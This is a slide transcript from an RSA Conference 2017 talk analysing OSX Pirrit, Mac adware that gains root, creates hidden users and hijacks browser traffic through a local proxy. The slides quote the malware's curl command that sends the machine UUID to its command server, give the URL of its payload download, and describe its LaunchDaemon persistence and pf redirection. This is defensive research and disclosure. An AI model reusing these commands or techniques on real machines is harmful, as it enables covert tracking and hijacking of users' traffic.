Adware isn’t taken seriously, especially threats targeting Macs. But OSX Pirrit, which can obtain root access and has components found in malware, shows that adware can become a huge security issue. Amit Serper will explain how OSX Pirrit works, why security professionals may want to rethink how commodity threats are handled and why Macs aren’t as secure as people think.
(Source : RSA Conference USA 2017)
3. #RSAC
$ whoami
3
• Amit Serper (What’s with the weird name, dude?)
• Principal security researcher @ Cybereason
Low level research (Kernel, reversing, etc...)
Writing poorly programmed attack simulation tools (crappy coder)
Malware research
HackingTeam server research (with @awfrazer):
Slides: http://hackedteam.lol
Paper: http://ht-paper.amit.wtf
Blogs: http://ht1.amit.wtf, http://ht2.amit.wtf
Lead security researcher @ Israeli government agency (9 years)
<REDACTED>
Follow me on twitter: @0xAmit
4. #RSAC
$ cat /Users/amit/agenda.txt
4
1. For those that weren’t around 15 years ago: Intro to adware
2. This apple is getting ripe: Adware on Mac
3. OSX.Pirrit
4. How they messed up
5. #RSAC
Intro to Adware
5
• Adware usually gets to your machine with installers.
• These installers install a program that you downloaded and then offer
you to add some other program that will enhance your expirience
6. #RSAC
Intro to Adware
6
1. Software that resides on one’s machine and displays ads
2. Adware divide into several categories:
• Plain and stupid – Just displays popups without any context
• The “norm” – Displays banners (and rarely popups) according to basic metrics
that are gathered from the browser
• The black-ops operative – Installs a hidden program that can see your entire
traffic, injects ads to pages you visit and even over-rides legitimate ads that
were put there in the first place (That’s stealing!)
7. #RSAC
Adware on the Mac
7
1. Similar to windows, adware to OS X comes usually in the form of
toolbars
2. These toolbars are safari plugins – like Spigot…
8. #RSAC
Adware on the Mac
8
1. Similar to windows, adware to OS X comes usually in the form of
toolbars
2. These toolbars are safari plugins – like Spigot…
3. Spigot also installs LaunchAgents!
http://www.thesafemac.com/arg-spigot
9. #RSAC
The story begins…
9
• An irc user “Xiano” popped in to #osxre @ freenode and told us that his
friend’s mac is acting weird
• He said that internet browsing is rather slow and some weird processes are
showing up.
• He then shared with us a weird executable called “sizzling”.
• Another channel member, “Paraxor” started reversing that executable and
quoted some function names
• It was immediately clear that this is some sort of adware because of these
strings
11. #RSAC
Qt?
• Qt (pronounced cute) is a cross-platform application
development framework
• Allows a developer to maintain a single codebase for an
application that will run on Windows, Linux, Mac and other
platforms…
• The ”cost” of that are a lot of external libraries that are
linked with your application
12. #RSAC
The story begins… (continued)
http://forums.macrumors.com/threads/what-is-unillumination-process-mavericks.1966015/
18. #RSAC
Let’s google that url…
http://shorte.st/st/2904deaf2db062b776f39f499bf88ad9/%1
Gives 1 result to a JoeSandbox analysis of a Windows PE executable
24. #RSAC
Xiano was back with more…
• He found an app bundle called “DemoUpdater”
on his friend’s machine.
• He mentioned that this app bundle was
running under a different user which he did not
know.
• Inside the app bundle was a x64 Mach-O binary
executable and a shell script called Update2.sh.
• This was far more interesting.
28. #RSAC
But what about that update2 shell script?
• When the executable finishes running, it executes Update2.sh
• It’s a HUGE script (330 lines) – it even has some inline python code (python –c)
Gets the machine uuid via command line (ioreg, parses its huge output with awk and grep)
Sends the machine ID to a server in order to get a new ID back from the server by issuing a curl
command:
curl "http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=<UUID>&ct=pd"
It validates your geolocation by curl’ing ipinfo.io/country and checks that you are from US, UK, Spain,
Australia, France, Germany, India, Italy, Netherlands or New Zealand in order to download a different
“ad package”.
It’s updating the C&C and telling it that the installation was successful, it uses the uuid as an
identifier.
After the C&C was notified, the script will download and install another program called
“DemoInjector”
29. #RSAC
So here’s what we know until now
• It’s an adware
• It generates traffic
• It’s cross-platform
• It’s definitely trying to hide strings and domains inside the binary
• It adds a hidden user with a weird name – it has to get root access
• It runs weird processes with strange names
• It has a componenet called “DemoUpdater”
33. #RSAC
• Mac equivalent of the MSI (Installer file)
• An extensible archive format (XAR)
• Has a nice wizard with useful EULA messages
• Can be signed with a developer certificate
• Has the ability to run pre/post install scripts!
PKG file?
34. #RSAC
• Pkg files are a very convenient way to drop
malware
• You can codesign them
• And you can just use the scripting features to do
whatever you want to.
PKG file!
39. #RSAC
DemoUpdater
• DemoUpdater is the first component that’s actually being installed by Pirrit.
• This is the component that lays the groundwork for the traffic hijacking proxy
• This is the script that generates the strange names
• After a random name was generated, it is being written to com.common.plist
• It then creates another plist to hold its preferences. That plist is created with a
random name on each install (com.<RANDOMWORD>.preferences.plist)
40. #RSAC
DemoUpdater
• The script then carries on with creating the DemoUpdater bundle and
executable while not forgetting to change its name to make detection harder
• It then downloads the next component, DemoInjector and adding a
LaunchDaemon for it.
41. #RSAC
Wait… LaunchDaemons?
• A LaunchDaemon is an autorun in Mac speak
• It loads when the computer boots
• And just like everything in OS X, it’s also stored in a plist file
42. #RSAC
The soil is ready… Now – plant the seed
• After all of the basic building blocks were layed, it is time for the main
event
• We have a random name generated for DemoUpdater
• We have an autorun set up for DemoUpdater
• Now it’s time to get the proxy and get crackin’!
• The proxy is DemoInjector (remember it from before?)
• It will be downloaded from:
"http://93a555685cc7443a8e1034efa1f18924.com/static/pd_files/dit3.tgz
• The number in the tgz file is incremental – different version
• The latest version of DemoInjector is dit8 and it is from April 10th 2016.
43. #RSAC
The soil is ready… Now – plant the seed
• The proxy is called DemoInjector.
• It is also a QT project.
• It also has a lot of shell scripts!
• The most interesting one is install_injector.sh
• It also generates a random company name and
executable name
• And it creates a hidden user!
49. #RSAC
And now – Traffic redirection!
• DemoInjector is listening on 127.0.0.1:9882
• All of the packets that are generated by everyone but $HIDDEN_USERS are
forwarded to DemoInjector using pf
• These settings also exist in another file that is dropped by the installer, called
/etc/change_net_settings. There’s also a LaunchDaemon for that!
52. #RSAC
Uncovering the perpetrators
• Like all good things… It happened totally by accident!
• I just got a fresh sample of another OSX/Pirrit installer
• As I was too lazy to disable the AV inside my OSX vm, I
decided that I should just list the files inside the
archive
56. #RSAC
Buzz is created!
• About 40 different papers/news site cover OSX/pirrit
• Including: ThreatPost, Ars Technica, SC Magazine and
more…
• All of them asked for TargetingEdge’s response.
• None got it. But one.
57. #RSAC
Calcalist – Isreal’s ‘The Economist’
TargetingEdge’s response (translated from Hebrew):
“We’ve read Cybereason’s highly inaccurate PR report. Among many wrong
details that are weaved all across their report, it is important to note that the
code featured in CR’s report does not belong to TargetingEdge but to an
Eastern European company…”
Now, who do YOU believe?